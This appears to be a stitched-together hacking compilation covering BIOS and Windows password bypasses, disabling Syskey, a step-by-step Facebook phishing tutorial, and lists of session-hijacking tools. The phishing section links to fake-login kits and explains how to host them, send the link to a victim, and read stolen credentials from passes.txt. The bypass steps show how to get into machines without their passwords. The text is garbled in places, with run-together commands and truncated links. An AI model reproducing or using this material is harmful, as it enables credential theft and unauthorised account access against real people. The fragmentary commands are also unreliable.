1 system security
TRANSCRIPT
Bios Password BypassBIOS passwords are used to add some extra security to computers.
You can either set a password to prevent access to BIOS settings or to prevent PC from booting.
But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally.
But there is no need to worry. There are many known ways to reset / remove / bypass the password:
By removing CMOS battery By using motherboard jumper By using MS DOS command By using software By using Backdoor BIOS password
1. By removing CMOS battery
Almost all motherboards use a small coin sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings.
2. By Using Motherboard Jumper:
Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual then look for the jumpers near the CMOS battery.
Most of the manufacturer label the jumper as CLR, CLEAR, CLEAR CMOS, etc.
When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either left or right pin. What you need to do, is remove the jumper and join the center pin to the opposite pin. e.g. if the jumper joins center pin to left pin, then remove it and join center pin to right pin. Now wait for a few seconds and then again remove the jumper and join the center pin to left pin.
3. By Using MS DOS Command:
This method works only if you have access to the system when its turned on because this method requires MS DOS. Open Command Prompt from Programs menu and provide following commands one bye one:
debugo 70 2Eo 71 FFquit
NOTE: The first character in the above commands is English alphabet "o" and not the number 0.
After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.
If you are curious to know how it works? then let me explain the above commands:
In this method we are using the Debug tool of MS DOS. The "o" character present at first in these commands, outputs the values to IO ports. The number 70 and 71 are port numbers which are used to access CMOS memory. By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password.
4. By Using Software:
There are a few software which can also reset CMOS settings or BIOS password or both within a few clicks. But as stated above you should have access to a system which is turned on and should have access to MS DOS or MS Windows:
CmosPwd KillCMOS
5. By Using Backdoor BIOS Password:Some BIOS manufacturer put a backdoor password in
BIOS which always works irrespective of what password you have set in BIOS. Its a master password which is used for testing and troubleshooting purposes.
SyskeySet Password
Start Menu >> Run > Syskey
>Uppdate > Set Password
Byass
1. Download http://www.triplescomputers.com/files/samreset.iso and burn the .iso to a CD.
2. Boot to the CD on the affected system.3. Follow the instructions to select the proper system drive and partition (NTFS is the
partition type you are looking for).4. Type the path to the registry files (it’s most likely Windows/system32/config).5. Choose option 1 for Password reset (sam system security).6. Choose option 2 for Syskey status & change.7. Confirm that you wish to disable Syskey, then quit and confirm writing the new
changes to the hive.8. Reboot the PC and check.
For more detailed instructions, check out this link (scroll down to “How to disable Syskey startup password”):
Bypass Windows 7 Logon Password with Command Prompt
Step 1: Start or restart your Windows 7 computer. Step 2: Press F8 to enter Advanced Boot Options before
the Windows 7 loading screen appears. Step 3: Choose Safe Mode with Command Prompt in the
coming screen, and then press Enter. Step 4: Wait for Windows 7 files loading until Windows login
screen comes up.
Step 5: Log in Windows with an administrator account until you see login screen.
Step 6: A Command Prompt appears. Type net user in the Command Prompt and then hit Enter. All Windows user accounts will be listed for you.
Step 7: Type net user APPle 12345 and hit Enter.
o Note: "APPLE" is your locked Windows user account name. And "12345" means the new password you want to reset for the locked account. User account "APPLE" will be reset with new password "12345".
Step 8: The new password has been successfully reset for user when the command is completed successfully.
Step 9: Login Windows 7 PC with the new password.
Phishing
Hack Facebook Or Any Account By Phishing Method Easily
Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend’s facebook password. Here i’m writting on hacking Facebbok password using Facebook Phisher.In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public
Facebook Phisher
Please Note: Phishing is legally offensive. I am not responsible for any action done by you.
Hacking Facebook password:
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.
1. First of all download from here:
http://www.mediafire.com/?1kjertebk6j3815
2. The downloaded file contains:
Index.html write.phpIf you want Fake login page of all the top sites then download it from here:-
http://rapidshare.com/files/12488717…y_MikiSoft.zip (AIO PHISHER)
3. Upload both files to any of these free web host sites:
www.yourfreehosting.net www.drivehq.com www.110mb.com www.t35.com www.esmartstart.com I prefer you to use http://www.my3gb.com/login.jsp4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.
5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown.
If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.
6. Now, open passes.txt to get hacked Facebook id and password as shown.
Hope this tutorial was useful for you.
If you are creating the phisher in http://www.000webhost.com then follow this tutorial:Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)
Step 2: Now Goto your email account that you gave and confirm your account with confirmation link
Step 3: Now download the phisher (http://www.mediafire.com/?klq1vak76bouzrw ) .
Step 4: Now Goto http://members.000webhost.com/ and Log into your account.
Step 5: Now when you are logged into your account click on the Go to Cpanel in front of your domain that you had registered, and then Go to File Manager under Files and
log into it.
Step 6: Now Click on the Public_html.
Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.
Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.
NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:
http://www.yoursitesadress.p4o.net/lol.html
If I am not clear in any point Please ask me in comments below.THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4sPS:> If www.p4o.net didn’t worked for you, you can use :www.drivehq.comwww.yourfreehosting.netwww.esmartstart.com
=============================================================The Input Data (Email and Password) will look like following:
Application Level
In the application level, the session hijacker not only tries to hijack existing sessions, butalso tries to create new sessions using stolen data. Session
hijacking at the application level mainly involves obtaining a valid session ID by some means in order to gain control of an existing session or to create a new unauthorized session
Obtain Session IDs
Application level session hijacking is all about obtaining the session ID, since
web applications key off of this value to determine identity.
Observation (Sniffing)
Brute Force
Network Level
Encrypted Transfer Protocols
Hacking Tools
•
Hacking Tool: Juggernaut (network based tool) packetstorm.securify.com
Hacking Tool: Hunt (network-based)
www.cri.cz/kra/index.html
Hacking Tool: TTYWatcher
(host-based)
Hacking Tool: IP Watcher (commercial
network-based) engarde.com
Hacking Tool: T-Sight (engarde.com)
Hacking Tool: DSniff
(MITM attack)
Remote TCP Session Reset Utility
(solarwinds.net) can be used to reset a remote TCP connection
Good for mgmt eg. Someone leaves session running
Malicious eg. DoS
attack as part of session hijacking